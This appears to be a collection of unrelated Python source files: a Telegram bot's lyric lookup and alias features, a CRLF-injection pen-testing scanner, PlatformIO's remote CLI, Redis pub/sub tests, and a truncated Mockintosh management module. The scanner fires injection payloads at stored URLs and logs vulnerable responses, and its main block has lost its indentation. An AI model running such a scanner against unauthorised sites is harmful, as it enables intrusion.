    # Multi-word titles are joined with the interpunct used by the API.
    text = text.replace(' ', '·')
    keyword = urllib2.quote(text)
    response = urllib2.urlopen(songci_api + keyword)
    # BUG FIX: read the body exactly once. The old code called response.read()
    # a second time when archiving; a second read() on an exhausted response
    # returns '', so the stored 'data' field was always empty.
    body = response.read()
    data = json.loads(body)
    Songci = Object.extend('Songci')
    __songci = Songci()
    __songci.set('keyword', keyword)
    __songci.set('data', body)
    __songci.save()
    try:
        a_songci = data['result']['list'][0]
    except TypeError as e:
        # result is null / not a dict when nothing matched.
        bot.sendMessage(chat_id=message.chat.id,
                        reply_to_message_id=message.message_id,
                        text='找不到对应的宋词')
        return
    __text = a_songci['title'] + '\n' + a_songci['author'] + '\n' + a_songci['content']
    # Strip circled/bracketed footnote markers the API embeds in the content.
    block_chars = '⓪①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳❶❷❸❹❺❻❼❽❾❿⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽⑾⑿⒀⒁⒂⒃⒄⒅⒆⒇'
    temp = ''
    for c in __text:
        if not c in block_chars:
            temp += c
    # NOTE(review): the first replace() argument was likely a non-breaking
    # space originally (it renders as a plain space) -- verify against the API.
    __text = temp.replace(' ', ' ').replace('<br />', '\n')
    bot.sendMessage(chat_id=message.chat.id, text=__text)
Haha = Object.extend('Haha')  # single-row counter table backing the /xu gag


def xu(message):
    """Increment the shared 'life' counter by one and announce the new total."""
    query = Query(Haha)
    haha = query.first()
    # The announced value is computed locally from the last fetched state;
    # increment() applies the +1 server-side.
    # NOTE(review): concurrent calls may announce duplicate totals.
    life = int(haha.get('life')) + 1
    haha.increment('life', 1)
    haha.save()
    reply = get_nickname(message.from_user) + ' 续了 1 秒,excited! 已经续了 ' + str(life) + ' 秒了。'
    bot.sendMessage(chat_id=message.chat.id, text=reply)
Alias = Object.extend('Alias')  # key -> replacement text, managed via /alias


def alias_filter(message):
    """Replace any configured alias keys found in a plain chat message and
    re-post the expanded text under the sender's name."""
    text = message.text
    query = Query(Alias)
    alises = query.find()
    if len(alises) == 0:
        return
    catch = False
    aliases_dict = {x.get('key'): x.get('value') for x in alises}
    keys = [x.get('key') for x in alises]
    # make the longer key be replaced first
    # NOTE(review): keys are not re.escape()d, so a key containing regex
    # metacharacters would corrupt this pattern -- confirm keys are plain text.
    matches = sorted(re.findall('|'.join(keys), text), key=lambda x: len(x), reverse=True)
    if len(matches) > 0:
        catch = True
    if len(matches) == 1:
        # Don't expand when the only alias maps back to the sender themselves.
        if aliases_dict.get(matches[0]) == ('@' + message.from_user.username):
            return
    for m in matches:
        if '@' in aliases_dict.get(m):
            # Mentions need a surrounding space so Telegram linkifies them.
            prefix = ' '
            if (prefix + m) in text:
                text = text.replace(m, aliases_dict.get(m) + ' ')
            else:
                text = text.replace(m, prefix + aliases_dict.get(m) + ' ')
        else:
            text = text.replace(m, aliases_dict.get(m))
    if catch == True:
        # Attribute the expanded message to its original sender.
        text = get_nickname(message.from_user) + ': ' + text
        bot.sendMessage(chat_id=message.chat.id,
                        text=text)
def help_for_alias(message):
    """Reply with /alias usage; errors (e.g. unreplyable message) are logged only."""
    try:
        return bot.sendMessage(chat_id=message.chat.id,
                               reply_to_message_id=message.message_id,
                               text='请使用 /alias <key> <value> 表示用 key 替换 value')
    except:
        logging.info('Reply message not found')
def alias(message):
    """Create, update or delete an alias mapping.

    `/alias <key> <value>` creates or overwrites; `/alias <key>` deletes an
    existing mapping. Anything else gets the usage message.
    """
    cmd, text = parse_cmd_text(message.text)
    texts = parse_text_array(text)
    if len(texts) == 0 or len(texts) > 2:
        return help_for_alias(message)
    query = Query(Alias)
    query.equal_to('key', texts[0])
    try:
        __old_a = query.first()
    except LeanCloudError as e:
        # first() raises when no row matches; treat as "no existing alias".
        __old_a = None
    if __old_a != None and len(texts) == 1:
        # /alias <key>: remove the existing mapping.
        __old_a.destroy()
    elif __old_a == None and len(texts) == 2:
        # New mapping.
        a = Alias()
        a.set('key', texts[0])
        a.set('value', texts[1])
        a.save()
    elif len(texts) == 2:
        # Existing mapping: overwrite the value.
        __old_a.set('value', texts[1])
        __old_a.save()
    send_successful(message)
|
crlf_injection.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import ninja
import argparse
import timeit
import multiprocessing as mp
import sys
# save_data의 경우는 함수마다 공격의 결과값을 판단하는 패턴이 다르므로 개별로 정의
class crlf(ninja.web):
    """CRLF-injection scanner; hits are written to the MongoDB "report" collection.

    save_data is defined per attack module because each attack judges success
    with a different response pattern (see the module header comment).
    """

    def save_data(self, method, case, url, payloads, res):
        """Check *res* headers for the injected marker and persist hits."""
        self.collection_saving_results = self.db["report"]
        print res.url
        res_content = res.content  # NOTE(review): unused; detection below looks at headers only
        headers = res.headers
        # A hit: the literal "injected" marker appears in a header name or value.
        for header in headers.keys():
            if (header.find("injected") != -1) or (headers[header].find("injected") != -1):
                # case2 and post
                if payloads:
                    self.collection_saving_results.insert({"url" : url,
                                                           "attack name" : "crlf injection",
                                                           "method" : method,
                                                           "case" : case,
                                                           "payload" : str(res.url) + str(payloads),
                                                           "res_code" : res.status_code,
                                                           "res_length" : len(str(res.content)),
                                                           "res_headers" : str(res.headers),
                                                           "res_content" : str(res.content),
                                                           "res_time" : res.elapsed.total_seconds()
                                                           })
                    print "[+] [%s][%s] %s?%s" %(case, method, url, payloads)
                # case1 and get, case2 and get
                else:
                    self.collection_saving_results.insert({"url" : url,
                                                           "attack name" : "crlf injection",
                                                           "method" : method,
                                                           "case" : case,
                                                           "payload" : res.url,
                                                           "res_code" : res.status_code,
                                                           "res_length" : len(str(res.content)),
                                                           "res_headers" : str(res.headers),
                                                           "res_content" : str(res.content),
                                                           "res_time" : res.elapsed.total_seconds()
                                                           })
                    print "[+] [%s][%s] %s" %(case, method, res.url)
if __name__ == "__main__":
usage = '''./crlf_injection.py -t testfire -p payload/crlf_strings -u demo.testfire.net -c cookie'''
parser = argparse.ArgumentParser(description = "crlf injection attack for pen testing", \
usage = usage)
parser.add_argument("-t", "--table", required=True, help="collection that saved urls")
parser.add_argument("-p", "--payload", required=True, help="payload characters to attack")
parser.add_argument("-u", "--url", required=True, help="requests in origin_url")
parser.add_argument("-c", "--cookie", required=False, help="filename that contains a cookie")
parser.add_argument("-o", "--timeout", required=False, help="default timeout is 1 sec")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.1 (05/05/2014)')
args = parser.parse_args()
collection_saving_urls = args.table
attack_strings_filename = args.payload
origin_url = args.url
cookie_filename = args.cookie
timeout = args.timeout
start_time = timeit.default_timer()
os_version = sys.platform
crlf = crlf(collection_saving_urls, cookie_filename, attack_strings_filename, timeout, origin_url)
# 공격의 예상시간을 출력
crlf.predict_attack_time()
processes = []
# 공격에 필요한 url을 테이블에서 가져옴
urls = crlf.search_urls()
if os_version.find("win32") == -1:
for url in urls:
process = mp.Process(target = crlf.attack_case1, args=(url,))
processes.append(process)
process.start()
for item in processes:
item.join()
else:
for url in urls:
process = mp.Process(target = crlf.attack_case1(url))
processes = []
# case 2,3
if os_version.find("win32") == -1:
for url in urls:
process = mp.Process(target = crlf.attack_case2, args=(url,))
processes.append(process)
process.start()
for item in processes:
item.join()
else:
for url in urls:
process = mp.Process(target = crlf.attack_case2(url))
end_time = timeit.default_timer()
print "*" * 120
print '\nattack is done: ', end_time - start_time
print "*" * 120 |
command.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-arguments, import-outside-toplevel
# pylint: disable=inconsistent-return-statements
import os
import subprocess
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs, proc
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.commands.run.command import cli as cmd_run
from platformio.commands.test.command import cli as cmd_test
from platformio.compat import PY2
from platformio.package.manager.core import inject_contrib_pysite
from platformio.project.exception import NotPlatformIOProjectError
@click.group("remote", short_help="Remote development")
@click.option("-a", "--agent", multiple=True)
@click.pass_context
def cli(ctx, agent):
    """Root `pio remote` group: rejects Python 2, stores the agent filter on
    the click context, and prepares the contrib pysite the remote client needs."""
    if PY2:
        raise exception.UserSideException(
            "PlatformIO Remote Development requires Python 3.5 or above. \n"
            "Please install the latest Python 3 and reinstall PlatformIO Core using "
            "installation script:\n"
            "https://docs.platformio.org/page/core/installation.html"
        )
    # Child commands read the selected agents from ctx.obj (via @click.pass_obj).
    ctx.obj = agent
    inject_contrib_pysite(verify_openssl=True)
@cli.group("agent", short_help="Start a new agent or list active")
def remote_agent():
    """Container group for `pio remote agent ...` subcommands."""
    pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
    "-d",
    "--working-dir",
    envvar="PLATFORMIO_REMOTE_AGENT_DIR",
    type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(name, share, working_dir):
    """Start a remote agent and block while it stays connected."""
    # Imported lazily: the client machinery is only needed for this command.
    from platformio.commands.remote.client.agent_service import RemoteAgentService

    RemoteAgentService(name, share, working_dir).connect()
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
    """Print the agents currently connected to the remote service."""
    from platformio.commands.remote.client.agent_list import AgentListClient

    AgentListClient().connect()
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
    "-c",
    "--only-check",
    is_flag=True,
    help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
    "--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
@click.pass_obj
def remote_update(agents, only_check, dry_run):
    """Run `update` on the selected remote agents."""
    from platformio.commands.remote.client.update_core import UpdateCoreClient

    # --only-check is kept for backward compatibility and folded into dry-run.
    UpdateCoreClient("update", agents, dict(only_check=only_check or dry_run)).connect()
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(
        exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_run(
    ctx,
    agents,
    environment,
    target,
    upload_port,
    project_dir,
    disable_auto_clean,
    force_remote,
    silent,
    verbose,
):
    """Process project environments remotely.

    Unless --force-remote is given, the firmware/filesystem is built locally
    first and only uploading is delegated to the remote agent.
    """
    from platformio.commands.remote.client.run_or_test import RunOrTestClient

    cr = RunOrTestClient(
        "run",
        agents,
        dict(
            environment=environment,
            target=target,
            upload_port=upload_port,
            project_dir=project_dir,
            disable_auto_clean=disable_auto_clean,
            force_remote=force_remote,
            silent=silent,
            verbose=verbose,
        ),
    )
    if force_remote:
        # Run everything (including the build) on the agent.
        return cr.connect()

    click.secho("Building project locally", bold=True)
    # Map the requested remote targets onto the equivalent local build step.
    local_targets = []
    if "clean" in target:
        local_targets = ["clean"]
    elif set(["buildfs", "uploadfs", "uploadfsota"]) & set(target):
        local_targets = ["buildfs"]
    else:
        local_targets = ["checkprogsize", "buildprog"]
    ctx.invoke(
        cmd_run,
        environment=environment,
        target=local_targets,
        project_dir=project_dir,
        # disable_auto_clean=True,
        silent=silent,
        verbose=verbose,
    )

    if any(["upload" in t for t in target] + ["program" in target]):
        click.secho("Uploading firmware remotely", bold=True)
        # The artifact was just built locally; tell the agent not to rebuild.
        cr.options["target"] += ("nobuild",)
        cr.options["disable_auto_clean"] = True
        cr.connect()

    return True
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(
        exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_test(
    ctx,
    agents,
    environment,
    ignore,
    upload_port,
    test_port,
    project_dir,
    force_remote,
    without_building,
    without_uploading,
    verbose,
):
    """Run unit tests remotely; unless --force-remote, build locally first."""
    from platformio.commands.remote.client.run_or_test import RunOrTestClient

    cr = RunOrTestClient(
        "test",
        agents,
        dict(
            environment=environment,
            ignore=ignore,
            upload_port=upload_port,
            test_port=test_port,
            project_dir=project_dir,
            force_remote=force_remote,
            without_building=without_building,
            without_uploading=without_uploading,
            verbose=verbose,
        ),
    )
    if force_remote:
        # Run everything (including the build) on the agent.
        return cr.connect()

    click.secho("Building project locally", bold=True)
    # Local pass compiles only: no upload and no on-device test run.
    ctx.invoke(
        cmd_test,
        environment=environment,
        ignore=ignore,
        project_dir=project_dir,
        without_uploading=True,
        without_testing=True,
        verbose=verbose,
    )

    click.secho("Testing project remotely", bold=True)
    # The binaries exist locally now; skip rebuilding on the agent.
    cr.options["without_building"] = True
    cr.connect()

    return True
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
    """Container group for `pio remote device ...` subcommands."""
    pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
@click.pass_obj
def device_list(agents, json_output):
    """List serial devices attached to the selected remote agents."""
    from platformio.commands.remote.client.device_list import DeviceListClient

    DeviceListClient(agents, json_output).connect()
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
    "--parity",
    default="N",
    type=click.Choice(["N", "E", "O", "S", "M"]),
    help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
    "--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
    "--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
    "--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
    "--encoding",
    default="UTF-8",
    help="Set the encoding for the serial port (e.g. hexlify, "
    "Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
    "--eol",
    default="CRLF",
    type=click.Choice(["CR", "LF", "CRLF"]),
    help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
    "--exit-char",
    type=int,
    default=3,
    help="ASCII code of special character that is used to exit "
    "the application, default=3 (Ctrl+C)",
)
@click.option(
    "--menu-char",
    type=int,
    default=20,
    help="ASCII code of special character that is used to "
    "control miniterm (menu), default=20 (DEC)",
)
@click.option(
    "--quiet",
    is_flag=True,
    help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
    "-e",
    "--environment",
    help="Load configuration from `platformio.ini` and specified environment",
)
@click.option(
    "--sock",
    type=click.Path(
        exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.pass_obj
@click.pass_context
def device_monitor(ctx, agents, **kwargs):
    """Monitor a remote device.

    Without --sock this spawns a child `pio remote device monitor --sock ...`
    process (the forwarder), waits for it to publish the local port in a
    socket file, and attaches the regular local monitor to that port.
    """
    from platformio.commands.remote.client.device_monitor import DeviceMonitorClient

    if kwargs["sock"]:
        # Child (forwarder) mode: connect straight to the agents.
        return DeviceMonitorClient(agents, **kwargs).connect()

    # Parent mode: resolve monitor options from the project config if present.
    project_options = {}
    try:
        with fs.cd(kwargs["project_dir"]):
            project_options = device_helpers.get_project_options(kwargs["environment"])
        kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
    except NotPlatformIOProjectError:
        pass
    kwargs["baud"] = kwargs["baud"] or 9600

    def _tx_target(sock_dir):
        # Re-invoke ourselves in child (--sock) mode with the resolved options.
        subcmd_argv = ["remote", "device", "monitor"]
        subcmd_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
        subcmd_argv.extend(["--sock", sock_dir])
        subprocess.call([proc.where_is_program("platformio")] + subcmd_argv)

    sock_dir = mkdtemp(suffix="pio")
    sock_file = os.path.join(sock_dir, "sock")
    try:
        t = threading.Thread(target=_tx_target, args=(sock_dir,))
        t.start()
        # Wait until the forwarder writes the port into the socket file or dies.
        while t.is_alive() and not os.path.isfile(sock_file):
            sleep(0.1)
        if not t.is_alive():
            return
        with open(sock_file) as fp:
            kwargs["port"] = fp.read()
        ctx.invoke(cmd_device_monitor, **kwargs)
        t.join(2)
    finally:
        fs.rmtree(sock_dir)
    return True
|
pub_sub_test.py | import redis
from assert_helper import *
import time
import threading
from conn import *
def subscribe(channel, master=True):
    """Subscribe to *channel* and block until a single message arrives.

    The received payload must equal "a"; the subscription is then dropped
    and the function returns.
    """
    pubsub = get_redis_conn(master).pubsub()
    pubsub.subscribe(channel)
    for event in pubsub.listen():
        if event['type'] != "message":
            continue
        assert (event['data'] == "a")
        pubsub.unsubscribe()
        break
def psubscribe(pattern, master=True):
    """Pattern-subscribe and block until a single matching message arrives.

    The received payload must equal "a"; the pattern subscription is then
    dropped and the function returns.
    """
    pubsub = get_redis_conn(master).pubsub()
    pubsub.psubscribe(pattern)
    for event in pubsub.listen():
        if event['type'] != "pmessage":
            continue
        assert (event['data'] == "a")
        pubsub.punsubscribe()
        break
def test_replication():
    """Publish once and expect subscribers on both master and slave to get it."""
    channel = "test_publish"
    x = threading.Thread(target=subscribe, args=(channel,))
    x.start()
    y = threading.Thread(target=subscribe, args=(channel, False))
    y.start()
    # Give both subscribers time to register before publishing.
    time.sleep(1)
    conn = get_redis_conn()
    ret = conn.publish(channel, "a")
    # PUBLISH returns the number of receivers on this node only.
    assert (ret == 1)
    time.sleep(0.01)
    ret = conn.execute_command("pubsub", "channels")
    # Both subscribers unsubscribe after one message, so no channels remain.
    assert (ret == [])
def test_pubsub_channels():
    """Exercise `PUBSUB CHANNELS` with and without glob-style patterns."""
    channel = "test_pubsub_channels"
    channel_two = "two_test_pubsub_channels"
    # Patterns expected to match / not match `channel` (glob `*`, `?`, `[..]`).
    pattern_match_all = "test*"
    pattern_unmatch_all = "a*"
    pattern_match_question_mark = "test?pubsub_channels"
    pattern_unmatch_question_mark = "tes?pubsub_channels"
    pattern_match_or = "tes[ta]_pubsub_channels"
    pattern_unmatch_or = "tes[sa]_pubsub_channels"
    x = threading.Thread(target=subscribe, args=(channel,))
    x.start()
    # Give the subscriber time to register.
    time.sleep(1)
    conn = get_redis_conn()
    ret = conn.execute_command("pubsub", "channels")
    assert (ret == [channel])
    ret = conn.execute_command("pubsub", "channels", pattern_match_all)
    assert (ret == [channel])
    ret = conn.execute_command("pubsub", "channels", pattern_unmatch_all)
    assert (ret == [])
    ret = conn.execute_command("pubsub", "channels", pattern_match_question_mark)
    assert (ret == [channel])
    ret = conn.execute_command("pubsub", "channels", pattern_unmatch_question_mark)
    assert (ret == [])
    ret = conn.execute_command("pubsub", "channels", pattern_match_or)
    assert (ret == [channel])
    ret = conn.execute_command("pubsub", "channels", pattern_unmatch_or)
    assert (ret == [])
    y = threading.Thread(target=subscribe, args=(channel_two,))
    y.start()
    time.sleep(1)
    ret = conn.execute_command("pubsub", "channels")
    assert (ret == [channel, channel_two])
    # Each subscriber exits after one message, emptying the channel list.
    ret = conn.publish(channel, "a")
    assert (ret == 1)
    ret = conn.publish(channel_two, "a")
    assert (ret == 1)
    time.sleep(0.01)
    ret = conn.execute_command("pubsub", "channels")
    assert (ret == [])
def test_pubsub_numsub():
    """Exercise `PUBSUB NUMSUB` as subscribers come and go."""
    channel = "test_pubsub_numsub"
    x = threading.Thread(target=subscribe, args=(channel,))
    x.start()
    time.sleep(1)
    conn = get_redis_conn()
    ret = conn.execute_command("pubsub", "numsub", channel)
    # NOTE: `1L` etc. are Python 2 long literals -- this test file is Python 2.
    assert (ret == [channel, 1L])
    y = threading.Thread(target=subscribe, args=(channel,))
    y.start()
    time.sleep(1)
    ret = conn.execute_command("pubsub", "numsub", channel)
    assert (ret == [channel, 2L])
    # Both subscribers receive the message and then unsubscribe.
    ret = conn.publish(channel, "a")
    assert (ret == 2)
    time.sleep(0.01)
    ret = conn.execute_command("pubsub", "numsub", channel)
    assert (ret == [channel, 0L])
def test_pubsub_numpat():
    """Exercise `PUBSUB NUMPAT` as pattern subscribers come and go."""
    channel = "test_publish"
    channel_two = "2_test_publish"
    pattern_match_all = "test*"
    pattern_match_all_two = "2*"
    conn = get_redis_conn()
    x = threading.Thread(target=psubscribe, args=(pattern_match_all,))
    x.start()
    time.sleep(1)
    ret = conn.execute_command("pubsub", "numpat")
    assert (ret == 1)
    y = threading.Thread(target=psubscribe, args=(pattern_match_all_two,))
    y.start()
    time.sleep(1)
    ret = conn.execute_command("pubsub", "numpat")
    assert (ret == 2)
    # Each pattern subscriber exits after one message, so the count drops to 0.
    ret = conn.publish(channel, "a")
    assert (ret == 1)
    ret = conn.publish(channel_two, "a")
    assert (ret == 1)
    time.sleep(0.01)
    ret = conn.execute_command("pubsub", "numpat")
    assert (ret == 0)
management.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: __init__
:synopsis: module that contains the handlers for the management API.
"""
import os
import re
import json
import copy
import shutil
import logging
import threading
from typing import (
Union,
Tuple, Optional, Awaitable
)
from collections import OrderedDict
from urllib.parse import parse_qs, unquote
import yaml
import yaml.scanner
import yaml.parser
from yaml.representer import Representer
import jsonschema
import tornado.web
from tornado.util import unicode_type
from tornado.escape import utf8
import mockintosh
from mockintosh.constants import PROGRAM
from mockintosh.config import ConfigExternalFilePath
from mockintosh.services.http import HttpService
from mockintosh.builders import ConfigRootBuilder
from mockintosh.handlers import GenericHandler
from mockintosh.helpers import _safe_path_split, _b64encode, _urlsplit
from mockintosh.exceptions import (
RestrictedFieldError,
AsyncProducerListHasNoPayloadsMatchingTags,
AsyncProducerPayloadLoopEnd,
AsyncProducerDatasetLoopEnd,
InternalResourcePathCheckError
)
from mockintosh.services.asynchronous import AsyncService, AsyncProducer, AsyncConsumer
from mockintosh.services.asynchronous._looping import run_loops as async_run_loops, stop_loops
from mockintosh.replicas import Request, Response
# Service-level fields that may not be changed through POST /config -- altering
# them would require re-binding listeners / re-reading certificates.
POST_CONFIG_RESTRICTED_FIELDS = ('port', 'hostname', 'ssl', 'sslCertFile', 'sslKeyFile')
# Service fields copied verbatim when building "unhandled requests" config stubs.
UNHANDLED_SERVICE_KEYS = ('name', 'port', 'hostname')
# Transport/standard headers excluded from generated endpoint definitions.
UNHANDLED_IGNORED_HEADERS = (
    'a-im',
    'accept', 'accept-charset', 'accept-datetime', 'accept-encoding', 'accept-language',
    'access-control-allow-credentials', 'access-control-allow-origin', 'access-control-request-headers',
    'access-control-request-method',
    'cache-control', 'connection', 'content-encoding', 'content-length', 'cookie',
    'date', 'dnt', 'expect', 'forwarded', 'from', 'front-end-https', 'host', 'http2-settings',
    'if-match', 'if-modified-since', 'if-none-match', 'if-range', 'if-unmodified-since',
    'max-forwards', 'origin', 'pragma', 'proxy-authorization', 'proxy-connection', 'range', 'referer',
    'save-data', 'sec-fetch-user', 'te', 'trailer', 'transfer-encoding', 'upgrade', 'upgrade-insecure-requests',
    'user-agent', 'via', 'warning',
    'x-att-deviceid', 'x-correlation-id',
    'x-forwarded-for', 'x-forwarded-host', 'x-forwarded-port', 'x-forwarded-proto',
    'x-http-method-override', 'x-real-ip', 'x-request-id', 'x-request-start', 'x-requested-with', 'x-uidh',
    'x-wap-profile',
    'x-envoy-expected-rq-timeout-ms', 'x-envoy-external-address'
)
# Directory containing this module (used to serve bundled static resources).
__location__ = os.path.abspath(os.path.dirname(__file__))
def str_representer(dumper, data):
    """Represent multiline strings with YAML literal block style ('|')."""
    style = None
    if "\n" in data.strip():  # pragma: no cover
        style = '|'
    return dumper.represent_scalar('tag:yaml.org,2002:str', data, style=style)
# Register custom representers: keep multiline strings readable in dumped YAML
# and serialize OrderedDicts as plain mappings.
yaml.add_representer(str, str_representer)
yaml.add_representer(OrderedDict, Representer.represent_dict)
def _reset_iterators(app):
    """Reset looped-response state (multi-response/dataset indices) for *app*.

    ``app`` is either an ``AsyncService`` or a Tornado application whose
    ``GenericHandler`` rule carries the per-endpoint alternatives.
    """
    if isinstance(app, AsyncService):
        for actor in app.actors:
            if actor.producer is not None:
                actor.producer.iteration = 0
        return
    for rule in app.default_router.rules[0].target.rules:
        if rule.target == GenericHandler:
            path_methods = rule.target_kwargs['path_methods']
            for _, methods in path_methods:
                for _, alternatives in methods.items():
                    for alternative in alternatives:
                        # None makes the handler start over from the first item.
                        alternative.multi_responses_index = None
                        alternative.dataset_index = None
            break
class ManagementBaseHandler(tornado.web.RequestHandler):
    """Base class for all management API handlers.

    Extends Tornado's ``write`` to accept ``dict`` payloads (serialized as
    pretty-printed JSON) and silences per-request access logging unless the
    root logger is at DEBUG level.
    """

    def write(self, chunk: Union[str, bytes, dict]) -> None:
        if self._finished:  # pragma: no cover
            raise RuntimeError("Cannot write() after finish()")
        if not isinstance(chunk, (bytes, unicode_type, dict)):  # pragma: no cover
            message = "write() only accepts bytes, unicode, and dict objects"
            if isinstance(chunk, list):
                message += (
                    ". Lists not accepted for security reasons; see "
                    + "http://www.tornadoweb.org/en/stable/web.html#tornado.web.RequestHandler.write"  # noqa: E501, W503
                )
            raise TypeError(message)
        if isinstance(chunk, dict):
            # Unlike Tornado's default, keep insertion order and indent for readability.
            chunk = json.dumps(chunk, sort_keys=False, indent=2)
            self.set_header("Content-Type", "application/json; charset=UTF-8")
        chunk = utf8(chunk)
        self._write_buffer.append(chunk)

    def _log(self) -> None:
        # Suppress access logs unless running at DEBUG level.
        if logging.DEBUG >= logging.root.level:
            self.application.log_request(self)

    def data_received(self, chunk: bytes) -> Optional[Awaitable[None]]:
        # Streaming uploads are not used by the management API.
        pass
class ManagementRootHandler(ManagementBaseHandler):
    """Serves the management UI landing page."""

    async def get(self):
        page_path = os.path.join(__location__, 'res/management.html')
        with open(page_path, 'r') as stream:
            self.write(stream.read())
class ManagementConfigHandler(ManagementBaseHandler):
    """Serves and hot-swaps the whole Mockintosh configuration at runtime."""

    def initialize(self, http_server):
        self.http_server = http_server

    async def get(self):
        data = self.http_server.definition.data
        self.dump(data)

    async def post(self):
        """Validate the posted config and replace the running services with it."""
        data = self.decode()
        definition = self.http_server.definition
        if data is None:
            return
        if not self.validate(data):
            return
        for i, service in enumerate(data['services']):
            if 'type' in service and service['type'] != 'http':  # pragma: no cover
                continue
            if not self.check_restricted_fields(service, i):
                return
        # Tear down async loops and routing state before re-analysis.
        stop_loops()
        self.http_server.clear_lists()
        definition.stats.services = []
        definition.services, definition.config_root = definition.analyze(data)
        for service in HttpService.services:
            self.update_service(service, service.internal_service_id)
        definition.stats.reset()
        definition.data = data
        self.update_globals()
        async_run_loops()
        self.set_status(204)

    def update_service(self, service: HttpService, service_index: int) -> None:
        """Rebuild the routing table of one HTTP service from *service*."""
        self.http_server.definition.stats.services[service_index].endpoints = []
        self.http_server.definition.logs.services[service_index].name = service.get_name_or_empty()
        http_path_list = []
        if service.endpoints:
            http_path_list = mockintosh.servers.HttpServer.merge_alternatives(
                service,
                self.http_server.definition.stats
            )
        path_methods = []
        for http_path in http_path_list:
            path_methods.append((http_path.path, http_path.methods))
        for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
            if rule.target == GenericHandler:
                rule.target_kwargs['path_methods'] = path_methods
                break
        mockintosh.servers.HttpServer.log_path_methods(path_methods)

    def check_restricted_fields(self, service: dict, service_index) -> bool:
        """Return False (writing a 400) if a restricted field was altered."""
        try:
            self._check_restricted_fields(service, service_index)
            return True
        except RestrictedFieldError as e:
            self.set_status(400)
            self.write(str(e))
            return False

    def _check_restricted_fields(self, service, service_index):
        # A restricted field may neither be added, removed nor modified.
        old_service = self.http_server.definition.data['services'][service_index]
        for field in POST_CONFIG_RESTRICTED_FIELDS:
            if (
                (field in service and field not in old_service)
                or  # noqa: W504, W503
                (field not in service and field in old_service)
                or  # noqa: W504, W503
                field in service and field in old_service and (
                    service[field] != old_service[field]
                )
            ):
                raise RestrictedFieldError(field)

    def update_globals(self):
        """Propagate the (possibly new) `globals` section to every handler."""
        for service in HttpService.services:
            self.http_server.globals = self.http_server.definition.data['globals'] if (
                'globals' in self.http_server.definition.data
            ) else {}
            for rule in self.http_server._apps.apps[service.internal_http_service_id].default_router.rules[0].target.rules:
                if rule.target == GenericHandler:
                    rule.target_kwargs['_globals'] = self.http_server.globals

    def decode(self) -> Union[dict, None]:
        """Parse the request body as YAML/JSON; write a 400 on parse errors."""
        body = self.request.body.decode()
        try:
            return yaml.safe_load(body)
        except (yaml.scanner.ScannerError, yaml.parser.ParserError) as e:
            self.set_status(400)
            self.write('JSON/YAML decode error:\n%s' % str(e))
            return None

    def validate(self, data) -> bool:
